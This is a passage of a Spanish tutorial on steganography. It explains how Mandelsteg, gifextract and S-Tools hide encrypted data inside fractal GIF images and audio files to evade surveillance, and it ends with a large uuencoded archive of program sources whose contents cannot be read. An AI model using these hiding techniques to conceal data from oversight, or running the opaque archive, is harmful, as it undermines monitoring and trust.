guarda los datos que se pasan como entrada segun las opciones que
indiquemos en linea de comandos, gifextract, que toma las imagenes generadas
por mandelsteg y extrae los datos.
Mandelsteg tiene diversas opciones que utilizaremos dependiendo del
nivel de seguridad deseado.
Si simplemente ejecutamos mandelsteg sin opciones, el programa generara
un gif de 640x480 de la seccion del conjunto por defecto de un fractal de
Mandelbrot. Con la opcion -c, calculara cuantos bytes pueden almacenarse en
la imagen, y con -e tomara los datos de la entrada y los almacenara en la
imagen. Podemos especificar un nombre de archivo despues de -e para el archivo
gif. Con -r, generara bytes aleatorios que colocara en la imagen, de forma que
podremos generar imagenes sin datos verdaderos para crear confusion.
Con el nivel de seguridad minimo que proporciona la opcion -e, los
datos seran guardados en el bit 7 de cada pixel y se generara una paleta de
128 colores de tal forma que los pixels tengan el mismo aspecto, contengan o
no da tos. Esto es suficiente para burlar vigilancias inexpertas, pero alguien
que conozca estas tecnicas podra descubrir facilmente que la imagen contiene
datos. Por ejemplo, sustituyendo la paleta por otra, se distinguiran
claramente los datos ocultos en areas de la imagen donde hay colores solidos.
Esto se puede evitar con la opcion -ns, que hara que se almacenen datos solo
en areas donde no haya colores solidos. Eso si, esta opcion reduce
drasticamente el numero de datos que puede almacenar la imagen, asi que antes
de utilizarla "directamente", conviene hacer primero una prueba con la opcion
-c.
Ejemplos
mandelsteg -e fractal.gif < archivo.txt
Genera un fractal que almacena en fractal.gif, imagen de 640x480, e introduce
los datos de archivo.txt.
mandelsteg -sz 400 400 -md -0.5505 -0.5505 0.0001 0.0001 -e fractal.gif
< archivo.txt
Crea un fractal utilizando coordenadas distintas de las empleadas por defecto,
lo almacena en una imagen de 400x400 e introduce los datos de archivo.txt.
mandelsteg -ns -sz 320 240 -c > /dev/null
Muestra por pantalla la cantidad de informacion que puede almacenar en una
imagen de las caracteristicas indicadas.
mandelsteg -fp -r -ns -e falso.gif < /dev/null
Crea un fractal que almacena en falso.gif y que contiene datos aleatorios
(util para despistar o hacer perder tiempo).
Por cierto, salvo que se tenga un Pentium potente, hay que ser pacientes con
este programa. El calculo de fractales supone muchas operaciones en coma
flotante...
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º GIFEXTRACT º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Gifextract simplemente toma como entrada una imagen y extrae los datos que
contiene por defecto, los extraera del bit 7, asi que si almacenamos los
datos en algun bit distinto, habra que indicarselo con la opcion -b. Tambien
si usamos la opcion -ns o -bp al generar la imagen con mandelsteg, habra que
utilizarlas con gifextract para extraer los datos correctamente.
Ejemplos
gifextract -b 4 < imagen.gif > datos.txt
Extrae los datos almacenados en el bit 4 de los pixels de imagen.gif y los
guarda en datos.txt
Cuestiones de seguridad
La pregunta es: ¨es seguro el uso de Mandelsteg? Pues la realidad es
que no (pero... esperad, leed primero las razones y despues encontrareis la
solucion!).
Las razones:
Los parametros de encriptacion si se saben de puede reproducir
igualmente por lo que no conviene usar dos veces las mismas coordenadas,
ademas estar cambiando continuamente es un poco engorroso porque al otro le
tienes que decir las coordenadas usando un medio de comunicacion seguro.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º S-TOOLS º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
S-Tools, escrito por Andrew Brown, es un programa para Windows que
permite encriptar y ocultar datos en archivos .wav o en imagenes en formato
.bmp o .gif.
Este programa es freeware, asi que puede distribuirse libremente, si
bien hay que tener en cuenta que, dado que incluye la implementacion de
diversos algoritmos criptograficos, por lo que puede estar sujeto a
restricciones en algunos paises.
Es un buen programa con un nivel de seguridad aceptable, ideal
para
windows.
En cuanto a los algoritmos criptograficos, se dispone de cuatro
algoritmos de clave unica: IDEA, DES, Triple DES y MDC.
MANEJO
El manejo es muy simple, y se realiza en combinacion con el Explorador
de Windows 95 o arrastrando los ficheros. Seleccionamos en el Explorador el
archivo wav o de imagen en el que queremos ocultar los datos y lo arrastramos
a la ventana de S-Tools. S-Tools abrira el archivo y lo mostrara en una
ventana, indicando ademas el numero de bytes que puede ocultar como maximo. A
continuacion, seleccionamos en el Explorador el archivo a ocultar y lo
arrastramos a la ventana del archivo "matriz" que esta en la ventana de
S-Tools. Si tenemos activada la opcion de compresion, se comprimira el archivo
de datos, y despues S-Tools mostrara un dialogo en el que nos pide la password
para la encriptacion y nos da a elegir el algoritmo criptografico a utilizar.
En caso de que el archivo "matriz" sea una imagen, aparecera otro dialogo con
diversas opciones referentes a como ha de manipular S-Tools los colores de la
imagen. Una vez hecho esto, comienza el proceso esteganografico, cuyo progreso
podemos seguir en la ventana Actions de S-Tools. Una vez terminado, podamos
grabar el archivo, haciendo click con el boton derecho del raton sobre la
ventana del archivo y elegiendo la opcion "Save" o "Save as..." del menu
contextual.
Para extraer los datos, bastara con arrastrar el archivo a la ventana
de S-Tools. Una vez lo haya abierto, pulsamos el boton derecho del raton sobre
la ventana del archivo y seleccionamos la opcion "Reveal". S-Tools nos pedira
la password y el algoritmo criptografico empleados al ocultar los datos, y si
la password es correcta, extraera los datos.
Nota: Los ejemplos se han escrito con la sintaxis de los sistemas Unix
(Linux, HP-UX, System V...), excepto el de S-Tools.
Aqui pongo los fuentes de algunos programas para que vayais probando
el resto los podreis encontrar en la web de raregazz, aqui estan uucodificados
Nota: Documento basado en el original de Jose Luis Martin Mas.
>>>> TEXTO <<<<
begin 644 Texto.tar.gz
M'XL(``:14R\``^Q<^W/;1I+>7SE_Q81>6Y1"TJ1>2:PH646F'=WZ59:5[)6M
M4D!P2&(%`@@&$,4DWK_]ONZ9`<"')"9USEVJQ'4D`ICIZ>GGUSW0OO0NU3`(
MU=\^X:?3Z>SO[TK\WNYN[]-O?-LUO_'I=K>[LK/WQ?;N_A<[^SOXWNWN[NS\
M378^)5/ND^O,2\'*Q!NK]-9QMS[^JWZ.C^6A'/F^%.*!/(O\>#)142:S<:!E
M'$E/ZCCT4EQ,/'\<1*HIXU1ZT4S&&>3E[LIID(UEGBL0&"A0RL9>)B$RC6]*
MZL3SE?3'7NKY&68%D<Z4-Y#QD!__5'DD'A`C3WO/3E[U3L%:Z^G9V<7IFZ/C
MGA!>ZI9>HZBX70H^")J/V]\?+HG[U-B2?R^/BPCGVT?/\RK0L1!E%^_40N
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
M-:38`SG%=87F#NSO;2G9UE)NRBW%ZSYYA%+C'J$$5GWAHB-^'G]`I"[ID]
M?5C2J7ON,&FG<H_.LBSTY/S:,*9MCWV/?/KSWH9\9(>79Q&FE+#G%(N'$H00
M0<&0:GWC:K(RPAM_<;W!(H)C3X47+`8*TRM;#')0R'[W]P4YUW];=$N+2(,2
M1QB_K-[?W[$/V#-M.BN<?ZDQN6*-^=T&G^]L;R+YN966GNZ8IR80?$)Y+`:Q
M6@7H+]BG?*BK_[CC-@>RSQ<0Z;DYOE]">>>+P.Q\'E*?F_/THM4A;$7L'&
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
M6-#TJK!/1L;4K%E9;69P-9+<.F#X>VH=;1\,-$?P1BRA)2>Q&%,S^D/'V&
M82&4#@^ZMM*6,;_A2,)C5\0-(UW^TS"F;R-84CLY[O,H+[A-@3ORJ$>E3VO&
M13L,.0XHW37FO+-Q/R87AR%&A%H1N9QHAZNE8I)!BYJP79;`OB.`31,5VZ1-
MUJ4NVJ"]V+);,^UDB,2T:S<T7NE%\4[??$/C]K:=.>7<8=O=S:(3[/_A]C?6
MT"KYS_WVQDWL$S[<_0C+W/Y5+J_X5P@)LK[B[2JLW7+7DQRWDM>#R#]/VZ+B
MCX][EM$.U8^[/^*6AR9I@!-K'00VK#)OM&KGB1!SW/=/OB1W,^?>+LR#[6B9
M%#9,L#T>)GK![07>(8>DZ+UDDNPWA[R=[J!,$JP5+/!G*2D.Z=\).X=XA$RI
M;]8(6L=@U(.!C\`T<B<?<LP@JD..9=`H,DL2$:78U^LG-PS$/[*QF4P]G=;!
M5S"6D[OC:#B`X3$TN#-E68/7<5UMVLN/(L^A\0V_!K2OK(]-O_QQ3D^D/#G"
M?Z:3]2KM4C:H\F=[GL5I%7594;U?Z9]?582,^U,$9P#E#3NJ5`VO59'%A,DE
M3$<`IU&$2.KXA;=EQ+4F:I^>_;2C]J7;SC%">GK0_21N8&XR.3]#DU?/1TT.
MWUKD.MCT(_1X$SYV+H7$:/(/)D?31XYF,SF:&Y,C1.X6!&EZ"-+!R!)D?<T5
M3`-QR=QN1HF6;">-/8SR>O02@D,3"4VJ`F<V]"TH6@&)-467/)@_T<,SFCM\
MQZ9="6Q=\?>IK\`?)-`DGN^JV67PL0Y%\[I^:*_)B#8(9[C19#_[D+S]+7>.
M[P6_]$>X-2IL29@5-^MQH-VB8,WTOF^*=`9KC5/`*OOQ_XCCSUY?G]C';+O_
MW_#T?&3\_\Z?G)]=/!'_OXN]_]_G>!X?DCE#CSJ47Y@?HJW/#T@-10MY&%N1
MF")9.D:"(@/$PN+%M_F$]3=2T5<19Q2>XJH?%IVTU)QR0KDH+L=I34536(3(
M!VW!M`FH$4S4^$Q8AYWVH\V^8U>Q1S8%G(43[H1RDF?;YJK]:#W&V#%6\O,A
MV3*GP[&0Q(FF=1TZX0_VZ\LV]:]DKC)_Z\1+('PD6Q*<")#3425ZDG$^+]>*
